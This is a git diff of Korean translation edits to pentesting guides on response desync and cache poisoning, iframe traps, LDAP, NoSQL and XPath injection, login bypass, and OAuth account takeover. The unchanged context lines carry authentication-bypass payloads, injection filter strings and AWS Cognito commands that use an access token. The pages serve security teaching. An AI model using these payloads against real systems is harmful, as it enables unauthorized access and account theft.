-그 후, **희생자**는 **HEAD** 요청의 **응답을 받게 되며**, 이는 **Content-Length는 포함하지만 콘텐츠는 전혀 포함하지 않습니다**. 따라서 프록시는 **이 응답을 희생자에게 전송하지 않고**, **어떤 콘텐츠**를 기다리게 되며, 이는 실제로 **노란색 요청에 대한 응답**(공격자가 주입한 것)입니다:
+그 후, **희생자**는 **HEAD** 요청의 **응답을 받게 되며**, 이는 **Content-Length는 포함하지만 콘텐츠는 전혀 포함하지 않을 것입니다**. 따라서 프록시는 **이 응답을 희생자에게 전송하지 않고**, **어떤 콘텐츠**를 기다리게 되며, 이는 실제로 **노란색 요청에 대한 응답**이 될 것입니다(공격자가 주입한):
 
 ![](<../images/image (735).png>)
 
 ### 콘텐츠 혼란
 
-이전 예제를 따라, **희생자가 받을 응답의 본문을 제어할 수 있고**, **HEAD** **응답**이 일반적으로 **Content-Type과 Content-Length**를 헤더에 포함한다는 것을 알고 있다면, **다음과 같은 요청을 보내어** 희생자에게 XSS를 유발할 수 있습니다. 페이지가 XSS에 취약하지 않더라도:
+이전 예제를 따라, **희생자가 받을 응답의 본문을 제어할 수 있고**, **HEAD** **응답**이 일반적으로 **Content-Type과 Content-Length**를 헤더에 포함한다는 것을 알고 있다면, 다음과 같은 요청을 **보내서 희생자에게 XSS를 유발**할 수 있습니다. 페이지가 XSS에 취약하지 않더라도:
 
 ![](<../images/image (688).png>)
 
 ### 캐시 오염
 
-이전에 언급한 응답 비동기화 콘텐츠 혼란 공격을 악용하면, **캐시가 희생자가 수행한 요청에 대한 응답을 저장하고 이 응답이 XSS를 유발하는 주입된 것이라면, 캐시는 오염됩니다**.
+이전에 언급한 응답 비동기화 콘텐츠 혼란 공격을 악용하여, **캐시가 희생자가 수행한 요청에 대한 응답을 저장하고 이 응답이 XSS를 유발하는 주입된 것이라면, 캐시는 오염됩니다**.
 
 XSS 페이로드를 포함한 악의적인 요청:
 
@@ -103,21 +103,21 @@ XSS 페이로드를 포함한 악의적인 요청:
 
 ### 웹 캐시 기만
 
-이 공격은 이전 공격과 유사하지만, **캐시에 페이로드를 주입하는 대신 공격자는 캐시 내에 희생자 정보를 캐시합니다**:
+이 공격은 이전 공격과 유사하지만, **캐시에 페이로드를 주입하는 대신 공격자는 캐시 내에 희생자 정보를 저장할 것입니다:**
 
 ![](<../images/image (991).png>)
 
 ### 응답 분할
 
-이 공격의 **목표**는 다시 **응답 비동기화**를 악용하여 **프록시가 100% 공격자가 생성한 응답을 전송하도록 만드는 것**입니다.
+이 공격의 **목표**는 다시 **응답 비동기화**를 악용하여 **프록시가 100% 공격자가 생성한 응답을 전송하게 만드는 것**입니다.
 
-이를 달성하기 위해 공격자는 **응답 내에서 일부 값을 반영하는 웹 애플리케이션의 엔드포인트를 찾아야** 하며, **HEAD 응답의 콘텐츠 길이를 알아야** 합니다.
+이를 달성하기 위해 공격자는 **응답 내에서 일부 값을 반영하는 웹 애플리케이션의 엔드포인트를 찾아야 하며**, **HEAD 응답의 콘텐츠 길이를 알아야 합니다**.
 
 그는 다음과 같은 **익스플로잇**을 보낼 것입니다:
 
 ![](<../images/image (911).png>)
 
-첫 번째 요청이 해결되고 공격자에게 전송된 후, **희생자의 요청이 대기열에 추가됩니다**:
+첫 번째 요청이 해결되고 공격자에게 전송된 후, **희생자의 요청이 대기열에 추가**됩니다:
 
 ![](<../images/image (737).png>)
 
@@ -125,7 +125,7 @@ XSS 페이로드를 포함한 악의적인 요청:
 
 ![](<../images/image (356).png>)
 
-그러나 **반영된 데이터가 HEAD 응답의 Content-Length에 따라 크기가 조정되어** **응답 대기열에서 유효한 HTTP 응답을 생성했습니다**.
+그러나 **반영된 데이터가 HEAD 응답의 Content-Length에 따라 크기가 조정되어** 응답 대기열에서 유효한 HTTP 응답을 생성했다는 점에 유의하십시오.
 
 따라서 **두 번째 희생자의 다음 요청은** **공격자가 완전히 제작한 응답을 받게 됩니다**. 응답이 공격자에 의해 완전히 제작되었기 때문에, 그는 또한 **프록시가 응답을 캐시하도록 만들 수 있습니다**.
 
diff --git a/src/pentesting-web/iframe-traps.md b/src/pentesting-web/iframe-traps.md
index c0dc78e80..890ddfa77 100644
--- a/src/pentesting-web/iframe-traps.md
+++ b/src/pentesting-web/iframe-traps.md
@@ -6,11 +6,11 @@
 
 이 iframe을 통한 XSS 악용 형태는 사용자가 웹 페이지를 이동하면서 정보를 훔치는 방법으로, trustedsec.com의 두 게시물에서 처음 발표되었습니다: [**여기**](https://trustedsec.com/blog/persisting-xss-with-iframe-traps) **및** [**여기**](https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams).
 
-공격은 XSS에 취약한 페이지에서 시작되며, **희생자가 XSS를 떠나지 않도록** 하여 **iframe 내에서 탐색하게** 만듭니다. 이 iframe은 전체 웹 애플리케이션을 차지합니다.
+공격은 XSS에 취약한 페이지에서 시작되며, **희생자가 XSS를 떠나지 않도록** 하여 **iframe 내에서 탐색**하게 만듭니다. 이 iframe은 전체 웹 애플리케이션을 차지합니다.
 
-XSS 공격은 기본적으로 화면의 100%에 웹 페이지를 iframe으로 로드합니다. 따라서 희생자는 **iframe 안에 있다는 것을 인식하지 못합니다**. 그런 다음, 희생자가 iframe 내의 링크를 클릭하여 페이지를 탐색하면, 그는 **iframe 내에서 탐색하고** 있으며, 이 탐색에서 정보를 훔치는 임의의 JS가 로드됩니다.
+XSS 공격은 기본적으로 화면의 100%에 웹 페이지를 iframe으로 로드합니다. 따라서 희생자는 **iframe 안에 있다는 것을 인식하지 못합니다**. 그런 다음, 희생자가 iframe 내의 링크를 클릭하여 페이지를 탐색하면, 그는 **iframe 내에서 탐색**하게 되며, 이 탐색에서 정보를 훔치는 임의의 JS가 로드됩니다.
 
-또한, 더 현실감 있게 만들기 위해, iframe이 페이지의 위치를 변경할 때를 확인하는 **리스너**를 사용하여 사용자가 브라우저를 사용하여 페이지를 이동하고 있다고 생각하는 위치로 브라우저의 URL을 업데이트할 수 있습니다.
+또한, 더 현실감 있게 만들기 위해, iframe이 페이지의 위치를 변경할 때 확인하는 **리스너**를 사용하여 사용자가 브라우저를 사용하여 페이지를 이동하고 있다고 생각하는 위치로 브라우저의 URL을 업데이트할 수 있습니다.
 
 <figure><img src="../images/image (1248).png" alt=""><figcaption><p><a href="https://www.trustedsec.com/wp-content/uploads/2022/04/regEvents.png">https://www.trustedsec.com/wp-content/uploads/2022/04/regEvents.png</a></p></figcaption></figure>
 
@@ -18,6 +18,6 @@ XSS 공격은 기본적으로 화면의 100%에 웹 페이지를 iframe으로 
 
 또한, 리스너를 사용하여 희생자가 방문하는 다른 페이지뿐만 아니라 **양식에 입력된 데이터**를 훔치거나 (자격 증명?) **로컬 스토리지를 훔치는** 것도 가능합니다...
 
-물론, 주요 제한 사항은 **희생자가 탭을 닫거나 브라우저에 다른 URL을 입력하면 iframe에서 벗어난다는** 것입니다. 이를 수행하는 또 다른 방법은 **페이지를 새로 고치는 것**이지만, 이는 iframe 내에서 새 페이지가 로드될 때마다 오른쪽 클릭 컨텍스트 메뉴를 비활성화하거나 사용자의 마우스가 iframe을 떠나는 것을 감지하여 브라우저의 새로 고침 버튼을 클릭할 가능성을 방지함으로써 부분적으로 **방지될 수 있습니다**. 이 경우 브라우저의 URL은 XSS에 취약한 원래 URL로 업데이트되므로 사용자가 이를 새로 고치면 다시 감염됩니다 (이는 매우 은밀하지 않다는 점에 유의하십시오).
+물론, 주요 제한 사항은 **희생자가 탭을 닫거나 브라우저에 다른 URL을 입력하면 iframe에서 벗어난다는 것입니다**. 이를 수행하는 또 다른 방법은 **페이지를 새로 고치는 것**이지만, 이는 iframe 내에서 새 페이지가 로드될 때마다 오른쪽 클릭 컨텍스트 메뉴를 비활성화하거나 사용자의 마우스가 iframe을 떠나는 것을 감지하여 브라우저의 새로 고침 버튼을 클릭할 가능성을 방지함으로써 부분적으로 **방지될 수 있습니다**. 이 경우 브라우저의 URL은 XSS에 취약한 원래 URL로 업데이트되므로 사용자가 이를 새로 고치면 다시 감염됩니다 (이는 매우 은밀하지 않다는 점에 유의하십시오).
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md
index d08d94d74..8a6aab598 100644
--- a/src/pentesting-web/ldap-injection.md
+++ b/src/pentesting-web/ldap-injection.md
@@ -14,7 +14,7 @@
 ../network-services-pentesting/pentesting-ldap.md
 {{#endref}}
 
-**LDAP Injection**은 사용자 입력으로부터 LDAP 문장을 구성하는 웹 애플리케이션을 목표로 하는 공격입니다. 애플리케이션이 입력을 **적절히 정화하지 못할** 때 발생하며, 공격자가 로컬 프록시를 통해 **LDAP 문장을 조작**할 수 있게 되어, 무단 접근이나 데이터 조작으로 이어질 수 있습니다.
+**LDAP Injection**은 사용자 입력으로부터 LDAP 문장을 구성하는 웹 애플리케이션을 대상으로 하는 공격입니다. 애플리케이션이 입력을 **적절히 정화하지 못할** 때 발생하며, 공격자가 로컬 프록시를 통해 **LDAP 문장을 조작**할 수 있게 되어, 무단 접근이나 데이터 조작으로 이어질 수 있습니다.
 
 {% file src="../images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
 
@@ -38,13 +38,13 @@
 `(&(!(objectClass=Impresoras))(uid=s*))`\
 `(&(objectClass=user)(uid=*))`
 
-데이터베이스에 접근할 수 있으며, 이 데이터베이스는 다양한 유형의 정보를 포함할 수 있습니다.
+데이터베이스에 접근할 수 있으며, 이는 다양한 유형의 정보를 포함할 수 있습니다.
 
 **OpenLDAP**: 2개의 필터가 도착하면 첫 번째 필터만 실행합니다.\
-**ADAM 또는 Microsoft LDS**: 2개의 필터가 있을 경우 오류가 발생합니다.\
-**SunOne Directory Server 5.0**: 두 필터를 모두 실행합니다.
+**ADAM 또는 Microsoft LDS**: 2개의 필터가 있으면 오류가 발생합니다.\
+**SunOne Directory Server 5.0**: 두 개의 필터를 모두 실행합니다.
 
-**올바른 구문으로 필터를 전송하는 것이 매우 중요하며, 그렇지 않으면 오류가 발생합니다. 필터는 1개만 전송하는 것이 좋습니다.**
+**올바른 구문으로 필터를 전송하는 것이 매우 중요하며, 그렇지 않으면 오류가 발생합니다. 필터는 하나만 전송하는 것이 좋습니다.**
 
 필터는 다음으로 시작해야 합니다: `&` 또는 `|`\
 예: `(&(directory=val1)(folder=public))`
@@ -148,7 +148,7 @@ ascii 문자, 숫자 및 기호를 반복할 수 있습니다:
 
 #### **유효한 LDAP 필드 발견**
 
-LDAP 객체는 **기본적으로 여러 속성을 포함하고** 있어 **정보를 저장하는 데 사용할 수 있습니다.** 이 정보를 추출하기 위해 **모든 속성을 무작위로 시도해 볼 수 있습니다.** [**기본 LDAP 속성 목록은 여기에서 확인할 수 있습니다**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
+LDAP 객체는 **기본적으로 여러 속성을 포함**하고 있어 **정보를 저장하는 데 사용할 수 있습니다**. 이 정보를 추출하기 위해 **모든 속성을 무작위로 시도해 볼 수 있습니다**. [**기본 LDAP 속성 목록은 여기에서 확인할 수 있습니다**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
 ```python
 #!/usr/bin/python3
 import requests
diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md
index 0ef30ff7b..1e4dd1516 100644
--- a/src/pentesting-web/login-bypass/README.md
+++ b/src/pentesting-web/login-bypass/README.md
@@ -4,30 +4,30 @@
 
 ## **정상 로그인 우회**
 
-로그인 페이지를 찾으면, 이를 우회하기 위해 시도할 수 있는 몇 가지 기술이 있습니다:
+로그인 페이지를 찾으면, 우회하기 위해 시도할 수 있는 몇 가지 기술이 있습니다:
 
 - 페이지 내 **주석** 확인 (아래로 스크롤하고 오른쪽으로?)
 - **제한된 페이지에 직접 접근**할 수 있는지 확인
-- **매개변수를 전송하지 않기** (아무것도 보내지 않거나 1개만 보내기)
-- **PHP 비교 오류** 확인: `user[]=a&pwd=b`, `user=a&pwd[]=b`, `user[]=a&pwd[]=b`
+- **매개변수를 전송하지 않기** (아무것도 전송하지 않거나 1개만 전송)
+- **PHP 비교 오류 확인:** `user[]=a&pwd=b`, `user=a&pwd[]=b`, `user[]=a&pwd[]=b`
 - **내용 유형을 json으로 변경**하고 json 값을 전송 (bool true 포함)
-- POST가 지원되지 않는다는 응답을 받으면 **GET 요청으로 본문에 JSON을 전송**해 볼 수 있습니다: `Content-Type: application/json`
-- nodejs의 잠재적 파싱 오류 확인 (읽어보세요 [**이것**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
+- POST가 지원되지 않는다는 응답을 받으면 **GET 요청으로 본문에 JSON을 전송**해 볼 수 있습니다. `Content-Type: application/json`
+- nodejs의 잠재적 파싱 오류 확인 (읽기 [**이것**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
 - Nodejs는 해당 페이로드를 다음과 유사한 쿼리로 변환합니다: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` 이는 비밀번호 비트가 항상 true가 되도록 만듭니다.
-- JSON 객체를 보낼 수 있다면 `"password":{"password": 1}`을 보내 로그인 우회.
-- 이 로그인을 우회하려면 여전히 **유효한 사용자 이름을 알고 보내야** 합니다.
+- JSON 객체를 보낼 수 있다면 `"password":{"password": 1}`을 전송하여 로그인을 우회할 수 있습니다.
+- 이 로그인을 우회하려면 여전히 **유효한 사용자 이름을 알고 전송해야** 한다는 점을 기억하세요.
 - `mysql.createConnection`을 호출할 때 **`"stringifyObjects":true`** 옵션을 추가하면 **매개변수로 `Object`가 전달될 때 모든 예기치 않은 동작을 차단**할 수 있습니다.
 - 자격 증명 확인:
 - 사용 중인 기술/플랫폼의 [**기본 자격 증명**](../../generic-hacking/brute-force.md#default-credentials)
 - **일반 조합** (root, admin, password, 기술 이름, 이러한 비밀번호 중 하나를 가진 기본 사용자).
-- **Cewl**을 사용하여 사전을 만들고 **기본** 사용자 이름과 비밀번호(있는 경우)를 추가한 후 모든 단어를 **사용자 이름과 비밀번호**로 사용하여 무차별 대입 시도.
+- **Cewl**을 사용하여 사전을 만들고 **기본** 사용자 이름과 비밀번호(있는 경우)를 추가한 후 모든 단어를 **사용자 이름과 비밀번호**로 사용하여 무차별 대입 시도
 - 더 큰 **사전**을 사용하여 **무차별 대입** (**[**무차별 대입**](../../generic-hacking/brute-force.md#http-post-form)**)
 
 ### SQL 인젝션 인증 우회
 
 [여기에서 **SQL 인젝션**을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다](../sql-injection/#authentication-bypass).
 
-다음 페이지에서는 SQL 인젝션을 통해 로그인 우회를 시도할 수 있는 **사용자 정의 목록**을 찾을 수 있습니다:
+다음 페이지에서는 SQL 인젝션을 통해 로그인을 우회하기 위해 시도할 수 있는 **사용자 정의 목록**을 찾을 수 있습니다:
 
 {{#ref}}
 sql-login-bypass.md
@@ -41,7 +41,7 @@ NoSQL 인젝션은 매개변수 값을 변경해야 하므로 수동으로 테
 
 ### XPath 인젝션 인증 우회
 
-[여기에서 **XPath 인젝션**을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다](../xpath-injection.md#authentication-bypass)
+[여기에서 **XPath 인젝션**을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다.](../xpath-injection.md#authentication-bypass)
 ```
 ' or '1'='1
 ' or ''='
@@ -75,11 +75,11 @@ admin))(|(|
 ```
 ### Remember Me
 
-페이지에 "**Remember Me**" 기능이 있는 경우, 그것이 어떻게 구현되었는지 확인하고 이를 악용하여 **다른 계정을 탈취**할 수 있는지 확인하세요.
+페이지에 "**Remember Me**" 기능이 있는 경우, 그것이 어떻게 구현되어 있는지 확인하고 이를 악용하여 **다른 계정을 탈취**할 수 있는지 확인하세요.
 
 ### Redirects
 
-페이지는 일반적으로 로그인 후 사용자를 리디렉션합니다. 그 리디렉션을 변경하여 [**Open Redirect**](../open-redirect.md)를 유발할 수 있는지 확인하세요. 사용자를 귀하의 웹사이트로 리디렉션하면 일부 정보(코드, 쿠키 등)를 훔칠 수 있을지도 모릅니다.
+페이지는 일반적으로 로그인 후 사용자를 리디렉션합니다. 그 리디렉션을 변경하여 [**Open Redirect**](../open-redirect.md)를 유발할 수 있는지 확인하세요. 사용자를 귀하의 웹으로 리디렉션하면 일부 정보(코드, 쿠키 등)를 훔칠 수 있을지도 모릅니다.
 
 ## Other Checks
 
diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md
index c124e5bf4..33c9370d6 100644
--- a/src/pentesting-web/nosql-injection.md
+++ b/src/pentesting-web/nosql-injection.md
@@ -19,7 +19,7 @@ username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non
 ```
 ### 기본 인증 우회
 
-**not equal ($ne) 또는 greater ($gt) 사용**
+**같지 않음 ($ne) 또는 큼 ($gt) 사용**
 ```bash
 #in URL
 username[$ne]=toto&password[$ne]=toto
@@ -223,7 +223,7 @@ get_password(u)
 - [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
 - [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)
 
-## 참고문헌
+## 참고자료
 
 - [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md
index b1cf80a85..2435f15eb 100644
--- a/src/pentesting-web/oauth-to-account-takeover.md
+++ b/src/pentesting-web/oauth-to-account-takeover.md
@@ -6,23 +6,23 @@
 
 OAuth는 다양한 버전을 제공하며, 기본적인 통찰력은 [OAuth 2.0 documentation](https://oauth.net/2/)에서 확인할 수 있습니다. 이 논의는 주로 널리 사용되는 [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/)에 중점을 두며, **애플리케이션이 다른 애플리케이션의 사용자 계정에 접근하거나 작업을 수행할 수 있도록 하는 인증 프레임워크**를 제공합니다.
 
-가상의 웹사이트 _**https://example.com**_을 고려해 보십시오. 이 사이트는 **모든 소셜 미디어 게시물을 보여주기 위해 설계되었습니다**, 개인 게시물도 포함하여. 이를 위해 OAuth 2.0이 사용됩니다. _https://example.com_은 **소셜 미디어 게시물에 접근할 수 있는 권한**을 요청합니다. 따라서 _https://socialmedia.com_에서 **요청되는 권한과 요청하는 개발자**를 설명하는 동의 화면이 나타납니다. 귀하의 승인이 이루어지면, _https://example.com_은 **귀하를 대신하여 게시물에 접근할 수 있는 능력을 갖게 됩니다**.
+가상의 웹사이트 _**https://example.com**_을 고려해 보십시오. 이 사이트는 **모든 소셜 미디어 게시물을 보여주기 위해 설계되었습니다**, 개인 게시물도 포함하여. 이를 달성하기 위해 OAuth 2.0이 사용됩니다. _https://example.com_은 **소셜 미디어 게시물에 접근할 수 있는 권한**을 요청합니다. 따라서 _https://socialmedia.com_에서 **요청되는 권한과 요청하는 개발자**를 설명하는 동의 화면이 나타납니다. 귀하의 승인이 이루어지면, _https://example.com_은 **귀하를 대신하여 게시물에 접근할 수 있는 능력을 얻게 됩니다**.
 
 OAuth 2.0 프레임워크 내에서 다음 구성 요소를 이해하는 것이 중요합니다:
 
-- **resource owner**: 귀하, 즉 **사용자/엔티티**로서 소셜 미디어 계정 게시물과 같은 리소스에 대한 접근을 승인합니다.
-- **resource server**: **인증된 요청을 관리하는 서버**로, 애플리케이션이 `access token`을 `resource owner`를 대신하여 확보한 후에 작동합니다. 예: **https://socialmedia.com**.
-- **client application**: `resource owner`로부터 **승인을 요청하는 애플리케이션**입니다. 예: **https://example.com**.
-- **authorization server**: `resource owner`의 성공적인 인증 후 `client application`에 `access tokens`를 발급하는 **서버**입니다. 예: **https://socialmedia.com**.
-- **client_id**: 애플리케이션의 공개 고유 식별자입니다.
+- **resource owner**: 귀하, 즉 **사용자/엔티티**가 소셜 미디어 계정 게시물과 같은 리소스에 대한 접근을 승인합니다.
+- **resource server**: **`access token`을 확보한 후 인증된 요청을 관리하는 서버**, 예: **https://socialmedia.com**.
+- **client application**: **`resource owner`로부터 권한을 요청하는 애플리케이션**, 예: **https://example.com**.
+- **authorization server**: **`resource owner`의 성공적인 인증 후 `client application`에 `access tokens`를 발급하는 서버**, 예: **https://socialmedia.com**.
+- **client_id**: 애플리케이션의 공개 고유 식별자.
 - **client_secret:** 애플리케이션과 인증 서버만 알고 있는 비밀 키로, `access_tokens`를 생성하는 데 사용됩니다.
-- **response_type**: **요청된 토큰의 유형**을 지정하는 값입니다. 예: `code`.
-- **scope**: `client application`이 `resource owner`로부터 요청하는 **접근 수준**입니다.
-- **redirect_uri**: **사용자가 승인 후 리디렉션되는 URL**입니다. 일반적으로 사전 등록된 리디렉션 URL과 일치해야 합니다.
-- **state**: **사용자의 인증 서버로의 리디렉션 간 데이터를 유지하기 위한 매개변수**입니다. 고유성이 **CSRF 보호 메커니즘**으로 작용하는 데 중요합니다.
-- **grant_type**: **부여 유형과 반환될 토큰의 유형**을 나타내는 매개변수입니다.
-- **code**: `authorization server`에서 발급된 인증 코드로, `client application`이 `access_token`을 획득하기 위해 `client_id` 및 `client_secret`과 함께 사용합니다.
-- **access_token**: **클라이언트 애플리케이션이 `resource owner`를 대신하여 API 요청에 사용하는 토큰**입니다.
+- **response_type**: **요청된 토큰의 유형**을 지정하는 값, 예: `code`.
+- **scope**: `client application`이 `resource owner`로부터 요청하는 **접근 수준**.
+- **redirect_uri**: **사용자가 인증 후 리디렉션되는 URL**. 일반적으로 사전 등록된 리디렉션 URL과 일치해야 합니다.
+- **state**: **사용자의 인증 서버로의 리디렉션 간 데이터를 유지하기 위한 매개변수**. 고유성이 **CSRF 보호 메커니즘**으로 작용하는 데 중요합니다.
+- **grant_type**: **부여 유형 및 반환될 토큰 유형을 나타내는 매개변수**.
+- **code**: `authorization server`에서 발급된 인증 코드로, `client application`이 `access_token`을 획득하는 데 `client_id` 및 `client_secret`과 함께 사용됩니다.
+- **access_token**: **`resource owner`를 대신하여 API 요청에 사용하는 클라이언트 애플리케이션의 토큰**.
 - **refresh_token**: 애플리케이션이 **사용자에게 다시 요청하지 않고 새로운 `access_token`을 얻을 수 있게 해줍니다**.
 
 ### Flow
@@ -30,7 +30,7 @@ OAuth 2.0 프레임워크 내에서 다음 구성 요소를 이해하는 것이
 **실제 OAuth 흐름**은 다음과 같이 진행됩니다:
 
 1. 귀하는 [https://example.com](https://example.com)으로 이동하여 “소셜 미디어와 통합” 버튼을 선택합니다.
-2. 사이트는 귀하의 게시물에 접근하기 위해 https://example.com의 애플리케이션에 대한 승인을 요청하는 [https://socialmedia.com](https://socialmedia.com)으로 요청을 보냅니다. 요청은 다음과 같이 구성됩니다:
+2. 사이트는 귀하의 게시물에 접근하기 위해 https://example.com의 애플리케이션이 허가를 요청하는 [https://socialmedia.com](https://socialmedia.com)으로 요청을 보냅니다. 요청은 다음과 같이 구성됩니다:
 ```
 https://socialmedia.com/auth
 ?response_type=code
@@ -58,7 +58,7 @@ Host: socialmedia.com
 
 `redirect_uri`는 OAuth 및 OpenID 구현에서 보안에 매우 중요하며, 이는 민감한 데이터(예: 인증 코드)가 인증 후 전송되는 위치를 지정합니다. 잘못 구성된 경우, 공격자가 이러한 요청을 악성 서버로 리디렉션할 수 있어 계정 탈취를 가능하게 합니다.
 
-악용 기술은 인증 서버의 검증 논리에 따라 다릅니다. 이는 엄격한 경로 일치에서 지정된 도메인 또는 하위 디렉토리 내의 모든 URL을 허용하는 것까지 다양합니다. 일반적인 악용 방법에는 오픈 리디렉션, 경로 탐색, 약한 정규 표현식 악용, 토큰 탈취를 위한 HTML 주입이 포함됩니다.
+악용 기술은 인증 서버의 검증 논리에 따라 다릅니다. 이는 엄격한 경로 일치에서 지정된 도메인 또는 하위 디렉토리 내의 모든 URL을 수용하는 것까지 다양합니다. 일반적인 악용 방법에는 열린 리디렉션, 경로 탐색, 약한 정규 표현식 악용 및 토큰 도용을 위한 HTML 주입이 포함됩니다.
 
 `redirect_uri` 외에도 `client_uri`, `policy_uri`, `tos_uri`, `initiate_login_uri`와 같은 다른 OAuth 및 OpenID 매개변수도 리디렉션 공격에 취약합니다. 이러한 매개변수는 선택 사항이며 서버마다 지원이 다릅니다.
 
@@ -82,7 +82,7 @@ OAuth 구현에서 **`state` 매개변수**의 오용 또는 누락은 **교차
 
 ### 계정 탈취 전 <a href="#ebe4" id="ebe4"></a>
 
-1. **계정 생성 시 이메일 검증 없이**: 공격자는 피해자의 이메일을 사용하여 미리 계정을 생성할 수 있습니다. 이후 피해자가 로그인 시 제3자 서비스를 사용하면, 애플리케이션이 이 제3자 계정을 공격자가 미리 생성한 계정에 우연히 연결할 수 있어 무단 접근이 발생할 수 있습니다.
+1. **계정 생성 시 이메일 검증 없음**: 공격자는 피해자의 이메일을 사용하여 미리 계정을 생성할 수 있습니다. 피해자가 나중에 로그인 시 제3자 서비스를 사용하면, 애플리케이션이 이 제3자 계정을 공격자가 미리 생성한 계정에 우연히 연결할 수 있어 무단 접근이 발생할 수 있습니다.
 2. **느슨한 OAuth 이메일 검증 악용**: 공격자는 이메일을 검증하지 않는 OAuth 서비스를 악용하여 자신의 서비스에 등록한 후 계정 이메일을 피해자의 이메일로 변경할 수 있습니다. 이 방법은 첫 번째 시나리오와 유사하게 무단 계정 접근의 위험을 초래하지만, 다른 공격 벡터를 통해 이루어집니다.
 
 ### 비밀 정보의 노출 <a href="#e177" id="e177"></a>
@@ -106,19 +106,19 @@ code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=au
 ```
 ### Referer Header leaking Code + State
 
-클라이언트가 **코드와 상태**를 가지고 있고, 다른 페이지로 이동할 때 **Referer 헤더에 반영된다면**, 이는 취약합니다.
+클라이언트가 **코드와 상태**를 가지고 있고, 다른 페이지로 이동할 때 **Referer 헤더에 반영된다면**, 취약합니다.
 
 ### Access Token Stored in Browser History
 
-**브라우저 기록으로 가서 액세스 토큰이 저장되어 있는지 확인하세요.**
+**브라우저 기록으로 가서 액세스 토큰이 저장되어 있는지 확인하세요**.
 
 ### Everlasting Authorization Code
 
-**인증 코드는 공격자가 이를 훔치고 사용할 수 있는 시간 창을 제한하기 위해 잠시만 존재해야 합니다.**
+**인증 코드는 공격자가 훔치고 사용할 수 있는 시간 창을 제한하기 위해 잠시만 존재해야 합니다**.
 
 ### Authorization/Refresh Token not bound to client
 
-**인증 코드를 얻고 이를 다른 클라이언트와 함께 사용할 수 있다면, 다른 계정을 탈취할 수 있습니다.**
+**인증 코드를 얻고 다른 클라이언트와 함께 사용할 수 있다면, 다른 계정을 탈취할 수 있습니다**.
 
 ### Happy Paths, XSS, Iframes & Post Messages to leak code & state values
 
@@ -126,7 +126,7 @@ code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=au
 
 ### AWS Cognito <a href="#bda5" id="bda5"></a>
 
-이 버그 바운티 보고서에서: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **AWS Cognito**가 사용자에게 반환하는 **토큰**이 **사용자 데이터를 덮어쓸 수 있는 충분한 권한을 가질 수 있습니다.** 따라서, **다른 사용자 이메일로 사용자 이메일을 변경할 수 있다면**, 다른 계정을 **탈취할 수 있을지도 모릅니다.**
+이 버그 바운티 보고서에서: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **AWS Cognito**가 사용자에게 반환하는 **토큰**이 **사용자 데이터를 덮어쓸 수 있는 충분한 권한을 가질 수 있습니다**. 따라서, **다른 사용자 이메일로 사용자 이메일을 변경할 수 있다면**, 다른 계정을 **탈취할 수 있을지도 모릅니다**.
 ```bash
 # Read info of the user
 aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
@@ -158,7 +158,7 @@ AWS Cognito를 악용하는 방법에 대한 자세한 정보는 다음을 확
 
 ### 두 링크 및 쿠키 <a href="#bda5" id="bda5"></a>
 
-[**이 글에 따르면**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), 피해자가 **returnUrl**이 공격자의 호스트를 가리키는 페이지를 열도록 만들 수 있었습니다. 이 정보는 **쿠키(RU)**에 **저장되며**, **나중에** **프롬프트**가 **사용자에게** 해당 공격자의 호스트에 대한 접근을 허용할 것인지 **묻습니다**.
